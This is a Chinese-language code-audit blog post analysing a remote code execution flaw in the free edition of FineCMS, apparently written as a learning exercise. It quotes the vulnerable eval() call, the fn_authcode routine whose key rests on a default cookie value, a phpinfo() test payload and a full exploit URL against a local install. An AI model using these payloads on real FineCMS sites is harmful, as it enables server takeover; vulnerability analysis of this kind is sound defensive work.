---
title: finecms免费版漏洞分析
date:  2018-10-03
tags: 
  - Web
  - PHP
categories: 代码审计
---

FineCMS是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统 

<!--more-->

## 0x00 开始前的准备

网上存在许多5.0.X的漏洞分析，本来想找个5.0.x版本的进行分析，结果最后只找到了一个免费版

## 0x01 寻找漏洞

在\extensions\下的function.php文件下有一个函数

![](finecms免费版漏洞分析/00.png)

其中的

```php
@eval("\$array = $data;");
```

很明显存在漏洞，先测试下

![](finecms免费版漏洞分析/01.png)

Payload:?a=array();phpinfo()

![](finecms免费版漏洞分析/02.png)

## 0x02 漏洞利用

回到CMS中，找一下哪里用了这个函数，在function.php文件里发现了一个fn_authcode函数

```php
/**
 * authcode函数(用于数组)
 */
function fn_authcode($data, $operation = 'DECODE', $key = '', $expiry = 0) {
	$ckey_length = 4;
	$string	= $operation == 'DECODE' ? $data : array2string($data);
	$key	= md5($key ? $key : SITE_MEMBER_COOKIE);
	$keya	= md5(substr($key, 0, 16));
	$keyb	= md5(substr($key, 16, 16));
	$keyc	= $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

	$cryptkey	= $keya . md5($keya . $keyc);
	$key_length = strlen($cryptkey);

	$string	= $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
	$string_length	= strlen($string);

	$result = '';
	$box	= range(0, 255);

	$rndkey = array();
	for($i	= 0; $i <= 255; $i++) {
		$rndkey[$i] = ord($cryptkey[$i % $key_length]);
	}

	for($j = $i = 0; $i < 256; $i++) {
		$j = ($j + $box[$i] + $rndkey[$i]) % 256;
		$tmp = $box[$i];
		$box[$i] = $box[$j];
		$box[$j] = $tmp;
	}

	for($a = $j = $i = 0; $i < $string_length; $i++) {
		$a = ($a + 1) % 256;
		$j = ($j + $box[$a]) % 256;
		$tmp = $box[$a];
		$box[$a] = $box[$j];
		$box[$j] = $tmp;
		$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
	}

	if($operation == 'DECODE') {
		if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {
			return string2array(substr($result, 26));
		} else {
			return '';
		}
	} else {
		return $keyc . str_replace('=', '', base64_encode($result));
	}
}
```

发现这个函数在ApiController.php文件中被调用

```php
$data = fn_authcode(base64_decode($this->get('file')), 'DECODE');
```

这里的file可控，现在只要构造合适的file就可以达成命令执行了,回到fn_authocode函数，这是一个只和SITE_MEMBER_COOKIE有关的函数，而SITE_MEMBER_COOKIE又是一个默认的值，只要将fn_authcode的参数改一下就可以构造成我们要的payload![](finecms免费版漏洞分析/03.png)

尝试下

```php
http://localhost/finecms/?c=api&a=down&file=ZmZlMXhvY3N4ZWluZnpuSEoyUGRBRkhPZ01rcGRQbFdLZ1RJT3pSaG0rR21ab1JyRS96c1dnMnFJT1dTMUVn
```

![](finecms免费版漏洞分析/07.png)

## 0x03 总结

这一次漏洞分析还是异常吃力，漏洞函数很容易就发现了，但是漏洞利用的地方找了半天，除此之外就是fn_authocode函数的加解密，长见识了，对网站的整体结构了解还是不够，继续努力。